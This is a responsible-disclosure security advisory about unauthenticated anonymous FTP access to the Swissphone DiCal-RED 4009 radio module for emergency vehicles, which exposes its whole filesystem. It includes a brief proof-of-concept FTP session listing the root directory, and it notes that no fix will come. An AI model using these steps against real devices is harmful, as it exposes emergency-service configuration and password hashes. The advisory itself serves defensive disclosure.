Headline
DiCal-RED 4009 Missing Authentication
DiCal-RED version 4009 provides an FTP service on TCP port 21. This service allows anonymous access, i.e. logging in as the user “anonymous” with an arbitrary password. Anonymous users get read access to the whole file system of the device, including files that contain sensitive configuration information, such as /etc/deviceconfig. The respective process on the system runs as the system user "ftp". Therefore, a few files with restrictive permissions are not accessible via FTP.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2024-036
Product: DiCal-RED
Manufacturer: Swissphone Wireless AG
Affected Version(s): Unknown
Tested Version(s): 4009
Vulnerability Type: Missing Authentication for Critical Function (CWE-306)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2024-04-16
Solution Date: None
Public Disclosure: 2024-08-20
CVE Reference: CVE-2024-36443
Author of Advisory: Sebastian Hamann, SySS GmbH
Overview:
DiCal-RED is a radio module for communication between emergency vehicles and
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity
and runs a Linux- and BusyBox-based operating system.
The manufacturer describes the product as follows (see [1]):
"The DiCal-Red radio data module reliably guides you to your destination. This
is ensured by the linking of navigation (also for the transmission of position
data) and various radio modules."
Due to anonymous FTP access, the device is vulnerable to the disclosure of
sensitive information, such as the device password's hash.
Vulnerability Details:
The device provides an FTP service on TCP port 21. This service allows
anonymous access, i.e. logging in as the user “anonymous” with an arbitrary
password. Anonymous users get read access to the whole file system of the
device, including files that contain sensitive configuration information, such
as /etc/deviceconfig.
The respective process on the system runs as the system user "ftp". Therefore,
a few files with restrictive permissions are not accessible via FTP.
Proof of Concept (PoC):
$ ftp <IP or hostname>
220 ProFTPD 1.3.3g Server (ProFTPD) [192.0.2.1]
500 OPTS UTF8 not understood
User (<IP or hostname>:(none)): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
usb2
mnt
etc
dev
proc
lib
home
htdocs
sbin
media
ram
linuxrc
root
gprscfg
run
usr
usb1
lost+found
bin
tmp
sys
var
226 Transfer complete
Solution:
The manufacturer recommends not running the device in an untrusted network.
Disclosure Timeline:
2024-02-29: Vulnerability discovered
2024-04-16: Vulnerability reported to manufacturer
2024-05-10: Manufacturer states that the vulnerability will not be fixed
2024-05-14: Vulnerability reported to CERT-Bund
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL
2024-08-20: Public disclosure of vulnerability
References:
[1] Product website for DiCal-RED
https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/
[2] SySS Security Advisory SYSS-2024-036
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-036.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
Credits:
This security vulnerability was found by Sebastian Hamann of SySS GmbH.
E-Mail: [email protected]
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc
Key ID: 0x9CE0E440429D8B96
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96
Disclaimer:
The information provided in this security advisory is provided “as is”
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd
i5bypA/8CtRcEEdS48fPfKJRheIMG5qdEBv3Rq8rljg+PqkoqeL6G6ztRYQkbcaX
Tl1+ajtOW3rPM9i9AExV6UIPG9IO+IY0v4vto1uHALZ7gkVeOe0bQXov0Lgbwr/y
dWrpv4tMFNo48pDZEU9bl1+fb6VtPoiF2QPyjvylpiMe1ONrUpxqkd5HsNkAw2V7
90X+Ma/+awXITwwTL/7iX6ryCvSZjN72wd1m1S9tcrQ0+/dUnoIZCDWNnLMSroUq
GoqxotzUD0ehDxSrKUG4eXY1yGjJcIRSjAspYfNCdOnzHmW3XgrgCkFoDHnB8RTv
bhL+uwxu99eQMkyrhPBZ34hGmRjIDpywbnrG6iX3+1pBiIslQQ/u3BYDdpYx3MJE
Rv0HX+qrHQxPFphb+ZvPO/LHJApwgmjvS81OutAnbAblOnBpapjcBN729Sd5B0Sn
x+MdUZOGQGEPKCXkBnHh7Dpt4zUlM8lmFALNhk2dW+eioZhC3RaYXc8GmcB7QyFo
OjyCcsP1yMjN2ITfw1Jg2NfPQ/o05RoWRAxa/zDepW4T4wDGguTyZCNdxsHAH3bV
2BtVF+jLOBhlf3/63RCzrRbiOIwKv6qkjjp5ymWwuALFaklpcjzFbx1Rwv9cl0Wy
8wbJBa6BgJOcAO0ODR+GyPCn79ZhvY6w9SqmXM9rWcVQb3Rz1Yk=
=lCcl
-----END PGP SIGNATURE-----